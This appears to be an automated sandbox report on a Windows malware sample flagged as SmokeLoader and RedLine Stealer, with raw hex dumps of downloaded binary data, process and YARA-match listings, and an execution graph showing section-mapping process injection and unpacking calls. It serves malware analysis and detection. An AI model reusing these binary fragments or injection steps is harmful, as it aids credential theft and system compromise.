                                                                2024-10-12 21:28:10 UTC8000INData Raw: 85 d2 74 07 c6 02 00 42 89 55 0c ff 07 8b 4d 10 e9 0e ff ff ff 8b 45 08 5e 5b 85 c0 74 03 83 20 00 ff 01 c9 c3 8b ff 55 8b ec 83 ec 0c 53 33 db 56 57 39 1d 70 9f b1 02 75 05 e8 fe ea ff ff 68 04 01 00 00 be e8 ba 41 00 56 53 88 1d ec bb 41 00 ff 15 94 70 41 00 a1 60 9f b1 02 89 35 a4 b2 41 00 3b c3 74 07 89 45 fc 38 18 75 03 89 75 fc 8b 55 fc 8d 45 f8 50 53 53 8d 7d f4 e8 0a fe ff ff 8b 45 f8 83 c4 0c 3d ff ff ff 3f 73 4a 8b 4d f4 83 f9 ff 73 42 8b f8 c1 e7 02 8d 04 0f 3b c1 72 36 50 e8 77 05 00 00 8b f0 59 3b f3 74 29 8b 55 fc 8d 45 f8 50 03 fe 57 56 8d 7d f4 e8 c9 fd ff ff 8b 45 f8 83 c4 0c 48 a3 88 b2 41 00 89 35 8c b2 41 00 33 c0 eb 03 83 c8 ff 5f 5e 5b c9 c3 8b ff 55 8b ec a1 f0 bb 41 00 83 ec 0c 53 56 8b 35 44 71 41 00 57 33 db 33 ff 3b c3 75 2e ff
                                                                Data Ascii: tBUME^[t US3VW9puhAVSApA`5A;tE8uuUEPSS}E=?sJMsB;r6PwY;t)UEPWV}EHA5A3_^[UASV5DqAW33;u.
                                                                2024-10-12 21:28:10 UTC8000INData Raw: 89 b5 d0 fd ff ff 89 bd cc fd ff ff 66 8c 95 f8 fd ff ff 66 8c 8d ec fd ff ff 66 8c 9d c8 fd ff ff 66 8c 85 c4 fd ff ff 66 8c a5 c0 fd ff ff 66 8c ad bc fd ff ff 9c 8f 85 f0 fd ff ff 8b 75 04 8d 45 04 89 85 f4 fd ff ff c7 85 30 fd ff ff 01 00 01 00 89 b5 e8 fd ff ff 8b 40 fc 6a 50 89 85 e4 fd ff ff 8d 85 d8 fc ff ff 6a 00 50 e8 65 e5 ff ff 8d 85 d8 fc ff ff 83 c4 0c 89 85 28 fd ff ff 8d 85 30 fd ff ff 6a 00 c7 85 d8 fc ff ff 15 00 00 40 89 b5 e4 fc ff ff 89 85 2c fd ff ff ff 15 d8 70 41 00 8d 85 28 fd ff ff 50 ff 15 d4 70 41 00 6a 03 e8 c9 ac ff ff cc 8b ff 55 8b ec 83 ec 10 ff 75 08 8d 4d f0 e8 83 a7 ff ff 0f b6 45 0c 8b 4d f4 8a 55 14 84 54 01 1d 75 1e 83 7d 10 00 74 12 8b 4d f0 8b 89 c8 00 00 00 0f b7 04 41 23 45 10 eb 02 33 c0 85 c0 74 03 33 c0 40 80
                                                                Data Ascii: ffffffuE0@jPjPe(0j@,pA(PpAjUuMEMUTu}tMA#E3t3@
                                                                2024-10-12 21:28:10 UTC8000INData Raw: 1f b3 d1 2a 19 25 fe 23 4d 60 90 5a 20 76 db 24 a1 cc 22 63 da 4a 44 80 3e 66 82 4b fa da 94 df 3f 8c ad 25 29 6d f9 07 97 96 5b 03 1b 36 2f c7 2e 68 0d 1e 80 19 b4 47 0e 09 f0 31 45 b4 67 43 4a 3c 00 85 ee cc 8b 12 c6 e6 a5 73 e3 ab f7 82 5b 6d 33 49 06 43 14 1d 6a a5 30 06 f9 8b 93 53 cf 5b b8 bb ee 09 31 15 7e cb 51 be b9 b7 0a 03 88 d5 fe 0e 43 9b f6 9e c8 3c 62 fd 9f bd 9b e6 98 f2 9b 37 c2 84 84 50 5f 02 4e d1 08 b8 f8 28 6e 8c d3 34 06 06 87 75 96 cc 39 f3 61 a5 ce d9 cb 51 c8 b5 2a 14 f0 40 3a 6c ac 4c a1 33 f9 f2 c0 0b cb 76 c1 d2 f7 c1 58 fd 87 4b e9 37 21 47 fd e6 e0 7f 95 fb 9c 1c 9d f2 be 71 70 24 4b 67 b4 0d 6b 50 48 92 36 6d b4 26 0d c1 c8 d5 c6 fd 2b a0 a5 00 d1 cf 72 ad 18 73 65 35 09 02 f7 cd 74 2f ce 8b 83 6f b0 e8 03 6f 9a 5e b1 c5 2f
                                                                Data Ascii: *%#M`Z v$"cJD>fK?%)m[6/.hG1EgCJ<s[m3ICj0S[1~QC<b7P_N(n4u9aQ*@:lL3vXK7!Gqp$KgkPH6m&+rse5t/oo^/
                                                                2024-10-12 21:28:10 UTC8000INData Raw: 8d 1c cf c3 47 24 a2 3e 12 2b 4d 60 cf 50 35 9b bb ed 13 05 fe 95 df 50 64 cb 31 3e 61 8a f4 d1 dc 50 fe a5 1a 3d 31 0b 33 cb e7 0f fc 56 40 70 b4 1a 47 30 eb 84 98 7d ed ac 5b a9 50 65 7f 0a 86 52 aa f3 29 df af 80 ab 8f 41 be 15 a3 b7 98 58 82 61 f5 3e 54 29 b6 e6 16 a7 f8 4b 8b 6b 88 d4 42 55 37 b9 be 05 16 55 16 04 e4 fe d6 b8 c5 59 72 61 9f 0c 6f dd cf 11 41 a2 91 fb bd 83 2d 95 87 90 2d b6 6a fa f3 5e e5 44 d6 71 eb e2 8b 02 dc 67 32 d0 ec fa 96 dd 47 6d 05 55 8e 0f b3 1b 12 45 0c 0a 8b f7 e7 0a a7 67 93 74 65 3f 6b 78 74 73 82 44 9f dc 52 1f 89 2f 17 0b 75 17 d7 c6 7e d4 37 3b 84 49 b0 cd 0e bd 91 b0 c9 1e 8e 7a 45 86 58 4f c4 4b f2 af a0 6a 17 8a fb db 38 f4 13 de f2 48 1e c3 96 54 a5 d4 e7 df c8 48 ac 15 53 ee dc c1 38 d8 17 1e 73 6c 59 35 ab f3
                                                                Data Ascii: G$>+M`P5Pd1>aP=13V@pG0}[PeR)AXa>T)KkBU7UYraoA--j^Dqg2GmUEgte?kxtsDR/u~7;IzEXOKj8HTHS8slY5
                                                                2024-10-12 21:28:10 UTC8000INData Raw: eb 51 34 f7 df f3 07 72 44 cd 59 05 39 a2 54 60 49 69 a5 12 6d 9f 62 00 a7 db 94 30 e9 ed 09 dd 9c 9b f3 04 5c 87 70 a0 02 d6 ca 5c dd 48 30 9d 84 8f c7 03 8d 02 ab 64 0c e9 66 c1 d2 08 fc 09 8d 8a bc e8 fb 8f f6 c6 24 b4 ea 15 83 a3 32 ca 91 ef 3d e8 6a fc 82 11 10 61 1d d3 f5 20 20 a1 c3 cd 71 ec 03 ec da 40 41 33 1d c2 8c ba 84 6c 52 1a 19 6d c7 93 2b 23 44 3a 5d ce 69 71 1a de 3b f0 12 fd 91 ac d3 54 d1 ed 2b 24 fe e9 80 fa 3f ba 10 33 07 74 b3 59 95 47 20 44 b6 5c d4 7c 2e 26 17 d9 c7 4a 08 bc 26 78 4d 2f eb b7 aa 77 ec d7 ae 47 a6 b6 8c bc 98 f0 ed 1d 41 06 86 95 86 35 b3 b9 89 af 45 8b 50 5d 59 ab 79 6b 7b 19 49 62 59 7f 90 b5 0e c6 d6 18 b5 74 b1 55 77 6e 47 5b 14 be 65 e7 de b0 47 03 54 67 b8 fc aa 7c bf 20 f8 3e 49 32 2d c0 36 dc 09 a1 0f 73 6e
                                                                Data Ascii: Q4rDY9T`Iimb0\p\H0df$2=ja q@A3lRm+#D:]iq;T+$?3tYG D\|.&J&xM/wGA5EP]Yyk{IbYtUwnG[eGTg| >I2-6sn
                                                                2024-10-12 21:28:10 UTC8000INData Raw: 3b 0f 32 0d b7 73 94 06 85 c9 8f 88 1b bd 5d 9a d1 c7 53 b3 4a 6c da 71 6a 59 ba 3a 69 e1 ff 36 90 c2 72 b4 c6 88 45 41 cf 49 c1 6f 35 8d 6c ee 6e b1 54 0d 2b 63 0b b4 f5 7a 36 48 1c 37 78 d5 d9 c1 21 35 18 44 8e b4 9e 57 4d 8f 2d c5 bf ac 5c e7 bf d2 6b 1a d9 81 3e b4 12 0f ac 06 ea 8e d3 7d a8 b3 73 5f c9 05 10 e9 5a e7 a2 03 b8 da 1e f5 e1 39 e7 f1 33 d0 13 ab 22 7d 68 55 d9 44 a1 4b 3b 0a a9 00 cf 05 92 39 67 ef ba 88 f6 74 6c d6 15 22 35 2f e7 37 65 c7 9d 04 c4 de f8 1f 91 f7 60 36 49 50 04 69 0b d3 aa f4 87 b8 ec 3e 3d 31 4a 38 dd 02 50 8a 94 6c 60 d0 9a d2 98 11 4e 7c ee f6 a1 d6 ba a6 70 bc 9e 45 dc 2d 4c 84 38 47 40 e4 f3 41 f7 c4 d1 36 19 91 ae e6 79 bb 58 72 27 3c 29 be da be 52 b9 f2 20 55 41 6c c0 1d 07 f9 be 95 e9 66 83 33 68 ba f1 fd 53 fa
                                                                Data Ascii: ;2s]SJlqjY:i6rEAIo5lnT+cz6H7x!5DWM-\k>}s_Z93"}hUDK;9gtl"5/7e`6IPi>=1J8Pl`N|pE-L8G@A6yXr'<)R UAlf3hS
                                                                2024-10-12 21:28:10 UTC8000INData Raw: f9 59 d0 23 23 42 31 ec 74 d1 b9 16 4c 36 49 d6 23 02 66 fe c9 68 69 b9 6a b8 c9 25 77 af 32 15 b1 2c 78 de ef 30 5c 34 f6 91 4e e7 83 01 9c 46 cf 02 c5 6d 14 fe d8 86 c4 1c 33 df 2f f2 76 db e6 b8 c6 c0 27 b2 a6 bc f6 90 33 ac b7 b0 3b 10 6d 31 30 43 ac 3f aa df 58 43 2d 33 c1 77 e4 3b 8d 67 bc f6 1a b2 51 24 41 ac 8a f6 7d 6b 50 bc 53 f2 e3 b8 25 4a 6a 56 0d e3 dc 00 1b 34 24 0d 08 25 93 2c 75 09 3e b9 16 da f2 da 8f da dc 87 77 08 5e 3b 26 bc e1 86 b1 3a 60 7e 32 20 82 d5 a2 5d 1a 3f 88 84 b7 ff a7 cb 53 28 4b b9 70 cd 69 3f b9 35 f0 57 95 0c b6 16 8d 8d f3 4e d8 8d 20 25 3d 0a d4 f6 73 bb b4 32 ff 4d 38 1a f8 65 cd c0 1b e3 37 59 89 f0 c5 e9 4a 24 1f 8d 6a ee b7 d2 8a 1e 28 be d2 a5 c6 e5 96 7c 29 46 dd 89 67 42 60 97 d0 5c 7f 90 15 ce 67 a0 fe 29 86
                                                                Data Ascii: Y##B1tL6I#fhij%w2,x0\4NFm3/v'3;m10C?XC-3w;gQ$A}kPS%JjV4$%,u>w^;&:`~2 ]?S(Kpi?5WN %=s2M8e7YJ$j(|)FgB`\g)
                                                                2024-10-12 21:28:10 UTC8000INData Raw: 93 9d 48 ad 0f 23 cc 41 fd 54 72 44 94 67 b5 fa 3a 68 c0 3f 37 b4 01 55 71 99 dd 34 37 be 21 58 23 04 43 9d 27 c0 10 df 54 53 7d b7 01 3c f2 8c ad fd 70 8a 99 3d 1b 3f df 60 2e b1 09 dd d3 f7 25 16 31 9b 4f 8f 91 54 ce af 19 34 fa b1 19 cc c7 87 84 ad 3c 5d 7e 59 d5 f3 27 2e 09 e9 07 63 3c 59 85 bf ba eb b5 46 6b 2a 9b 9c 0d 57 00 d1 4b 53 0d d5 41 b8 d3 de e2 dd b1 e8 73 22 dc 47 73 d4 d0 54 2d 3b 29 fc cd 9a 67 62 39 fe 08 75 a9 12 86 c6 05 35 29 ff ee f4 0a b0 a1 f3 29 80 59 62 09 4f 27 31 21 f5 e2 39 06 a6 fe ba bd a5 5a 94 29 6a 41 26 53 dd 94 a1 0b 6d ee 87 92 6c 08 08 48 11 4f 69 60 87 60 1b 6b bb 48 5a db 0d 10 2d 71 50 37 ab 40 3a e8 84 cc 3d 79 1b 80 a8 46 84 51 7c e3 7e fd 19 0a 9b 52 41 fc 51 c8 d3 6f c8 75 54 8a 37 e0 40 02 45 9a 4b 96 e2 3d
                                                                Data Ascii: H#ATrDg:h?7Uq47!X#C'TS}<p=?`.%1OT4<]~Y'.c<YFk*WKSAs"GsT-;)gb9u5))YbO'1!9Z)jA&SmlHOi``kHZ-qP7@:=yFQ|~RAQouT7@EK=


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:17:27:03
                                                                Start date:12/10/2024
                                                                Path:C:\Users\user\Desktop\LgigaSKsL6.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\LgigaSKsL6.exe"
                                                                Imagebase:0x400000
                                                                File size:243'712 bytes
                                                                MD5 hash:C61F76C54CE0F89894EF870A48C5497C
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1816543399.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1816543399.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1816464417.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1816255737.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1816485243.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1816485243.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:1
                                                                Start time:17:27:12
                                                                Start date:12/10/2024
                                                                Path:C:\Windows\explorer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\Explorer.EXE
                                                                Imagebase:0x7ff72b770000
                                                                File size:5'141'208 bytes
                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:5
                                                                Start time:17:27:32
                                                                Start date:12/10/2024
                                                                Path:C:\Users\user\AppData\Roaming\vsvrjra
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Roaming\vsvrjra
                                                                Imagebase:0x400000
                                                                File size:243'712 bytes
                                                                MD5 hash:C61F76C54CE0F89894EF870A48C5497C
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2075651122.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2075687376.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2075687376.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2075723481.0000000002D01000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2075723481.0000000002D01000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2075795209.0000000002D77000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                Antivirus matches:
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 42%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:7
                                                                Start time:17:28:09
                                                                Start date:12/10/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\A869.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Local\Temp\A869.exe
                                                                Imagebase:0x400000
                                                                File size:243'712 bytes
                                                                MD5 hash:E3C51CB2EE848A9BED855AB3E756CD82
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.2440499657.0000000002C17000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2440394206.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2440394206.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2440584366.0000000002F11000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2440584366.0000000002F11000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.2440325792.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                Antivirus matches:
                                                                • Detection: 100%, Joe Sandbox ML
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:9
                                                                Start time:17:28:36
                                                                Start date:12/10/2024
                                                                Path:C:\Users\user\AppData\Roaming\ajvrjra
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Roaming\ajvrjra
                                                                Imagebase:0x400000
                                                                File size:243'712 bytes
                                                                MD5 hash:E3C51CB2EE848A9BED855AB3E756CD82
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2771177068.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2771177068.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.2771494482.0000000002CC7000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2771763885.0000000003001000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2771763885.0000000003001000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000009.00000002.2771062212.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                Antivirus matches:
                                                                • Detection: 100%, Joe Sandbox ML
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:10
                                                                Start time:17:30:01
                                                                Start date:12/10/2024
                                                                Path:C:\Users\user\AppData\Roaming\vsvrjra
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Roaming\vsvrjra
                                                                Imagebase:0x400000
                                                                File size:243'712 bytes
                                                                MD5 hash:C61F76C54CE0F89894EF870A48C5497C
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:11
                                                                Start time:17:30:01
                                                                Start date:12/10/2024
                                                                Path:C:\Users\user\AppData\Roaming\ajvrjra
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Roaming\ajvrjra
                                                                Imagebase:0x400000
                                                                File size:243'712 bytes
                                                                MD5 hash:E3C51CB2EE848A9BED855AB3E756CD82
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:false

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:9.4%
                                                                  Dynamic/Decrypted Code Coverage:31.9%
                                                                  Signature Coverage:42.9%
                                                                  Total number of Nodes:163
                                                                  Total number of Limit Nodes:7
                                                                  execution_graph 3383 402e40 3385 402e37 3383->3385 3386 402edf 3385->3386 3387 4018e6 3385->3387 3388 4018f5 3387->3388 3389 40192e Sleep 3388->3389 3390 401949 3389->3390 3392 40195a 3390->3392 3393 401514 3390->3393 3392->3386 3394 401524 3393->3394 3395 4016e0 3394->3395 3396 4015c4 NtDuplicateObject 3394->3396 3395->3392 3396->3395 3397 4015e1 NtCreateSection 3396->3397 3398 401661 NtCreateSection 3397->3398 3399 401607 NtMapViewOfSection 3397->3399 3398->3395 3400 40168d 3398->3400 3399->3398 3401 40162a NtMapViewOfSection 3399->3401 3400->3395 3402 401697 NtMapViewOfSection 3400->3402 3401->3398 3403 401648 3401->3403 3402->3395 3404 4016be NtMapViewOfSection 3402->3404 3403->3398 3404->3395 3405 2fc003c 3406 2fc0049 3405->3406 3418 2fc0e0f SetErrorMode SetErrorMode 3406->3418 3411 2fc0265 3412 2fc02ce VirtualProtect 3411->3412 3414 2fc030b 3412->3414 3413 2fc0439 VirtualFree 3417 2fc04be LoadLibraryA 3413->3417 3414->3413 3416 2fc08c7 3417->3416 3419 2fc0223 3418->3419 3420 2fc0d90 3419->3420 3421 2fc0dad 3420->3421 3422 2fc0dbb GetPEB 3421->3422 3423 2fc0238 VirtualAlloc 3421->3423 3422->3423 3423->3411 3424 415c20 3425 415c2d 3424->3425 3426 415e10 3425->3426 3427 415ce7 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW 3425->3427 3428 415e20 SetCommState 3426->3428 3432 415e39 3426->3432 3429 415d4d 7 API calls 3427->3429 3428->3426 3430 415e01 3429->3430 3431 415dfa PulseEvent 3429->3431 3430->3426 3431->3430 3433 415f06 3432->3433 3434 415e46 7 API calls 3432->3434 3445 415870 LocalAlloc 3433->3445 3441 415eda 3434->3441 3438 415f0b LoadLibraryA 3446 4158a0 GetModuleHandleW GetProcAddress VirtualProtect 3438->3446 3439 415f5d 3447 415b90 3439->3447 3441->3433 3442 415f62 3443 415f99 InterlockedDecrement 3442->3443 3444 415faf 3442->3444 3443->3442 3445->3438 3446->3439 3448 415bb9 QueryDosDeviceW 3447->3448 3449 415bca 3447->3449 3448->3449 3458 415a30 3449->3458 3452 415be5 3461 415a70 3452->3461 3453 415bdd FreeEnvironmentStringsA 3453->3452 3456 415c0c 3456->3442 3457 415bfc HeapDestroy GetNumaHighestNodeNumber 3457->3456 3459 415a41 FatalAppExitA GetModuleHandleW 3458->3459 3460 415a53 3458->3460 3459->3460 3460->3452 3460->3453 3462 415a7d 3461->3462 3463 415aa9 3462->3463 3464 415a98 BuildCommDCBA 3462->3464 3465 415ad3 3463->3465 3466 415ab1 WritePrivateProfileStringA FreeEnvironmentStringsA 3463->3466 3464->3465 3468 415b09 GetNumaAvailableMemoryNode GetComputerNameW SetCalendarInfoA OpenJobObjectA GetShortPathNameW 3465->3468 3469 415b5a 3465->3469 3470 415a60 3465->3470 3466->3465 3468->3465 3469->3456 3469->3457 3473 4159f0 3470->3473 3474 415a19 3473->3474 3475 415a0c SetEvent 3473->3475 3474->3465 3475->3474 3499 2c4a0a5 3500 2c4a0b6 3499->3500 3501 2c4a856 3 API calls 3500->3501 3502 2c4a0ce 3501->3502 3556 401542 3557 40153b 3556->3557 3558 4015c4 NtDuplicateObject 3557->3558 3567 4016e0 3557->3567 3559 4015e1 NtCreateSection 3558->3559 3558->3567 3560 401661 NtCreateSection 3559->3560 3561 401607 NtMapViewOfSection 3559->3561 3562 40168d 3560->3562 3560->3567 3561->3560 3563 40162a NtMapViewOfSection 3561->3563 3564 401697 NtMapViewOfSection 3562->3564 3562->3567 3563->3560 3565 401648 3563->3565 3566 4016be NtMapViewOfSection 3564->3566 3564->3567 3565->3560 3566->3567 3615 402dd0 3616 402ddc 3615->3616 3617 4018e6 8 API calls 3616->3617 3618 402edf 3616->3618 3617->3618 3511 4018f1 3512 4018f6 3511->3512 3513 40192e Sleep 3512->3513 3514 401949 3513->3514 3515 401514 7 API calls 3514->3515 3516 40195a 3514->3516 3515->3516 3476 2c4a0b6 3477 2c4a0c5 3476->3477 3480 2c4a856 3477->3480 3481 2c4a871 3480->3481 3482 2c4a87a CreateToolhelp32Snapshot 3481->3482 3483 2c4a896 Module32First 3481->3483 3482->3481 3482->3483 3484 2c4a8a5 3483->3484 3485 2c4a0ce 3483->3485 3487 2c4a515 3484->3487 3488 2c4a540 3487->3488 3489 2c4a551 VirtualAlloc 3488->3489 3490 2c4a589 3488->3490 3489->3490 3602 401915 3603 4018c6 3602->3603 3604 40191a 3602->3604 3605 40192e Sleep 3604->3605 3606 401949 3605->3606 3607 401514 7 API calls 3606->3607 3608 40195a 3606->3608 3607->3608 3491 402f97 3492 4030ee 3491->3492 3493 402fc1 3491->3493 3493->3492 3494 40307c RtlCreateUserThread NtTerminateProcess 3493->3494 3494->3492 3530 2fc0005 3535 2fc092b GetPEB 3530->3535 3532 2fc0030 3537 2fc003c 3532->3537 3536 2fc0972 3535->3536 3536->3532 3538 2fc0049 3537->3538 3539 2fc0e0f 2 API calls 3538->3539 3540 2fc0223 3539->3540 3541 2fc0d90 GetPEB 3540->3541 3542 2fc0238 VirtualAlloc 3541->3542 3543 2fc0265 3542->3543 3544 2fc02ce VirtualProtect 3543->3544 3546 2fc030b 3544->3546 3545 2fc0439 VirtualFree 3549 2fc04be LoadLibraryA 3545->3549 3546->3545 3548 2fc08c7 3549->3548 3592 402d7b 3593 402d38 3592->3593 3593->3592 3594 402dc7 3593->3594 3595 4018e6 8 API calls 3593->3595 3595->3594 3550 2fc0001 3551 2fc0005 3550->3551 3552 2fc092b GetPEB 3551->3552 3553 2fc0030 3552->3553 3554 2fc003c 7 API calls 3553->3554 3555 2fc0038 3554->3555 3517 4014fe 3518 401506 3517->3518 3519 401531 3517->3519 3520 4015c4 NtDuplicateObject 3519->3520 3529 4016e0 3519->3529 3521 4015e1 NtCreateSection 3520->3521 3520->3529 3522 401661 NtCreateSection 3521->3522 3523 401607 NtMapViewOfSection 3521->3523 3524 40168d 3522->3524 3522->3529 3523->3522 3525 40162a NtMapViewOfSection 3523->3525 3526 401697 NtMapViewOfSection 3524->3526 3524->3529 3525->3522 3527 401648 3525->3527 3528 4016be NtMapViewOfSection 3526->3528 3526->3529 3527->3522 3528->3529

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 415c20-415c48 2 415c50-415c57 0->2 3 415c59-415c5b 2->3 4 415c5f-415c65 2->4 3->4 5 415c67-415c71 4->5 6 415c76-415c80 4->6 5->6 7 415c82-415c8e 6->7 8 415c98-415c9f 6->8 7->8 8->2 9 415ca1-415ca9 8->9 11 415cb0-415cb6 9->11 12 415cc4-415ccb 11->12 13 415cb8-415cbe 11->13 14 415cd1-415cd8 12->14 15 415ccd 12->15 13->12 14->11 16 415cda-415ce1 14->16 15->14 17 415e10-415e1e 16->17 18 415ce7-415df8 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW SetDefaultCommConfigW MoveFileW GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA LCMapStringA 16->18 19 415e20-415e2e SetCommState 17->19 21 415e01-415e0d 18->21 22 415dfa-415dfb PulseEvent 18->22 24 415e30-415e37 19->24 25 415e39-415e40 19->25 21->17 22->21 24->19 24->25 26 415f06-415f15 call 415870 25->26 27 415e46-415f00 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA GetTimeFormatW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryType 25->27 33 415f17-415f28 26->33 34 415f4d-415f58 LoadLibraryA call 4158a0 26->34 27->26 35 415f30-415f40 33->35 40 415f5d-415f6e call 415b90 34->40 38 415f42 35->38 39 415f48-415f4b 35->39 38->39 39->34 39->35 45 415f70-415f77 40->45 46 415f83-415f89 45->46 47 415f79-415f7f 45->47 48 415f90-415f97 46->48 49 415f8b call 415890 46->49 47->46 52 415fa6-415fad 48->52 53 415f99-415fa0 InterlockedDecrement 48->53 49->48 52->45 55 415faf-415fbf 52->55 53->52 57 415fc0-415fd0 55->57 58 415fd2 57->58 59 415fd9-415fdc 57->59 58->59 59->57 60 415fde-415ff0 59->60
                                                                  APIs
                                                                  • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415CF2
                                                                  • ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00415D0B
                                                                  • FindAtomW.KERNEL32(00000000), ref: 00415D12
                                                                  • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00415D1A
                                                                  • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415D32
                                                                  • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415D59
                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00415D61
                                                                  • GetVersionExW.KERNEL32(?), ref: 00415D6E
                                                                  • DisconnectNamedPipe.KERNEL32(?), ref: 00415D81
                                                                  • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415DC6
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415DD5
